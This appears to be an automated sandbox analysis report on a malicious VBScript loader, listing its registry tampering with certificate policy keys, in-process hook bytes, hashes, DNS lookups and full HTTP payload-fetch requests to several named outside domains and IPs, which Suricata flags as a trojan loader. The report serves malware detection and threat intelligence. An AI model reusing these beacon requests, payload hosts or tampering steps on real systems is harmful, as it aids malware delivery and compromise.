Heuristic match: "GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: a.8xcornwall.com"
Pattern match: "www.kitaair.com" - source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "blackishness staphyloplastic Physoderma expansionists Tolypeutes Manzanola Neo-hebrew fusspot examens unamazedly microcythemia aschaffite polysyllabic wagonload glottogony Barco subdichotomously graecophil semiflexible Swatchel Boiko smelt- diipenates eburine Theressa Eucalyptus pseudo-intransitive liven Tamera Aclemon mazuca spookiness tendineal peristeromorphous chello metoestrous Eranthemum boltant brinjarry desynchronize reheater licour dikkop Lobale Sagunto Nemesis Eastwood rainbands Polonial Harpies hydrofluate premise tradesfolk chagrinned strength-decaying dotier sudes twittery counterdemonstration processs" (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Creates or modifies windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies Software Policy Settings
- details
-
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "e7397477e1a678772e717877ee29787785e273776da07877906477773ad57e7726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74FF1000" (part of module "WSHIP6.DLL")
"wscript.exe" wrote bytes "39c860b0" to virtual address "0x6D1B1FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "fae67377e1a678772e717877ee29787785e273776da0787726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74AC1000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "c04e767720547777e0657777b53878770000000000d09b7500000000c5ea9b750000000088ea9b7500000000e9687d7582287877ee29787700000000d2697d75000000007dbb9b750000000009be7d7500000000ba189b7500000000" to virtual address "0x77131000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
MSG_225796.vbs
- Filename
- MSG_225796.vbs
- Size
- 925KiB (947565 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- a9246a824a769730eb6ecbbe974adb9390744a984c9385a64a9a8d16a6fcf5eb
- MD5
- ea996a38945983e7eb5be1389b15201f
- SHA1
- e0635812720a7563e1fcbadfec0210a7309c70ec
- ssdeep
- 12288:kN062C4FlSOqpolnrrFU8pOTNgbw/ZCkiS4ZRHLtRagHUFAXpkMW:kNYHgOJlnrrFjpORgAZCxV0K5K
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total.
- wscript.exe "C:\MSG_225796.vbs" (PID: 3192)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
a.8xcornwall.com |
77.104.140.85
TTL: 11945 |
- | Bulgaria |
gdpronline.sk |
37.9.175.9
TTL: 599 |
- | Slovakia (SLOVAK Republic) |
hotdsk.com
OSINT |
173.249.60.219
TTL: 14399 |
Innovadeus Pvt. Ltd. | Germany |
kitaair.com |
46.16.91.179
TTL: 21599 |
- | Italy |
www.kitaair.com |
46.16.91.179
TTL: 19821 |
- | Italy |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
173.249.60.219 |
80
TCP |
wscript.exe PID: 3192 |
Germany |
46.16.91.179 |
80
TCP |
wscript.exe PID: 3192 |
Italy |
46.16.91.179 |
443
TCP |
wscript.exe PID: 3192 |
Italy |
37.9.175.9 |
80
TCP |
wscript.exe PID: 3192 |
Slovakia (SLOVAK Republic) |
77.104.140.85 |
80
TCP |
wscript.exe PID: 3192 |
Bulgaria |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
173.249.60.219:80 (hotdsk.com) | GET | hotdsk.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: hotdsk.com More Details |
46.16.91.179:80 (kitaair.com) | GET | kitaair.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: kitaair.com More Details |
37.9.175.9:80 (gdpronline.sk) | GET | gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk More Details |
77.104.140.85:80 (a.8xcornwall.com) | GET | a.8xcornwall.com/12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: a.8xcornwall.com More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 173.249.60.219:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 46.16.91.179:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 77.104.140.85:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 37.9.175.9:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report
- Not all sources for indicator ID "registry-17" are available in the report
- Not all sources for indicator ID "registry-18" are available in the report
- Not all sources for indicator ID "registry-19" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report